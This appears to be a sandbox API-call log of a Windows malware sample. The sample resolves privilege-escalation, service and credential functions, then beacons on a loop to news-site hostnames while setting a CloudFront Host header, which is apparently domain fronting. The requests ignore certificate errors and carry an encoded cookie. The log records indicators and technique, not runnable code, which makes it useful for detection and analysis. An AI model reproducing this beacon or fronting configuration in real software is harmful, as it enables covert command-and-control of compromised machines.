Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76be4ca0 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x75d636d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x75d606a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x75d5ee90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessWithLogonW, address_out = 0x75d77170 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = DeleteService, address_out = 0x75d75e30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x75d60ad0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextA, address_out = 0x75d60c00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LogonUserA, address_out = 0x75d74330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x75d5f8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x75d604a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RevertToSelf, address_out = 0x75d60af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x75d5f0c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = DuplicateTokenEx, address_out = 0x75d60c20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupAccountSidA, address_out = 0x75d73510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x75d5ed40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x75d5f570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x75d5f870 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessAsUserA, address_out = 0x75d637c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x75d60680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x75d755f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatusEx, address_out = 0x75d64680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateNamedPipeClient, address_out = 0x75d760f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x75d60ec0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueA, address_out = 0x75d73e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x75d5ed20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceA, address_out = 0x75d76590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerA, address_out = 0x75d60f30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x75d639f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessWithTokenW, address_out = 0x75d61340 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = StartServiceA, address_out = 0x75d76a40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreateServiceA, address_out = 0x75d75670 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x73b20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x73b9acb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x73bbb730 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryDataAvailable, address_out = 0x73b74320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x73b911e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x73c80b80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x73b6d400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x73b925a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x73ba2410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x73b9ff90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x73b9b210 True 1
Fn
Module Load module_name = WS2_32.dll, base_address = 0x76470000 True 1
Fn
Module Load module_name = DNSAPI.dll, base_address = 0x72d90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x72da9540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_A, address_out = 0x72dd5aa0 True 1
Fn
Module Load module_name = IPHLPAPI.DLL, base_address = 0x72d60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetIfEntry, address_out = 0x72d65c00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetIpAddrTable, address_out = 0x72d7f240 True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x73b00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = LsaCallAuthenticationPackage, address_out = 0x742a3b10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = LsaConnectUntrusted, address_out = 0x742a3900 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = LsaLookupAuthenticationPackage, address_out = 0x742a3a10 True 1
Fn
System Get Time type = System Time, time = 2018-02-15 18:29:37 (UTC) True 1
Fn
System Get Time type = Ticks, time = 130234 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76bda330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76bd7580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76bd9910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76bdf400 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x771ea200 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x771ea200 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x771ea200 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Get Filename process_name = c:\windows\syswow64\explorer.exe, file_name_orig = C:\Windows\SysWOW64\explorer.exe, size = 260 True 1
Fn
System Get Time type = System Time, time = 2018-02-15 18:29:37 (UTC) True 1
Fn
Keyboard Get Info type = KB_CODEPAGE, result_out = 437 True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:29:37 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 130531 True 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x76bd96e0 True 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = LHnIwsj, address_out = 192.168.0.237 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:29:40 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:29:40 (Local Time) True 1
Fn
System Sleep duration = 12318 milliseconds (12.318 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:29:51 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:29:51 (Local Time) True 1
Fn
System Sleep duration = 14821 milliseconds (14.821 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:30:02 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:30:02 (Local Time) True 1
System Sleep duration = 13167 milliseconds (13.167 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:30:14 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:30:14 (Local Time) True 1
System Sleep duration = 14846 milliseconds (14.846 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:30:25 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:30:25 (Local Time) True 1
System Sleep duration = 13753 milliseconds (13.753 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:30:36 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:30:36 (Local Time) True 1
System Sleep duration = 13554 milliseconds (13.554 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:30:47 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:30:47 (Local Time) True 1
System Sleep duration = 13968 milliseconds (13.968 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:30:57 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:30:57 (Local Time) True 1
System Sleep duration = 14658 milliseconds (14.658 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:31:08 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:31:08 (Local Time) True 1
System Sleep duration = 12283 milliseconds (12.283 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:31:19 (Local Time) True 1
Inet Close Session - True 1
Inet Close Session - True 1
System Get Time type = Local Time, time = 2018-02-16 05:31:19 (Local Time) True 1
System Sleep duration = 12105 milliseconds (12.105 seconds) True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
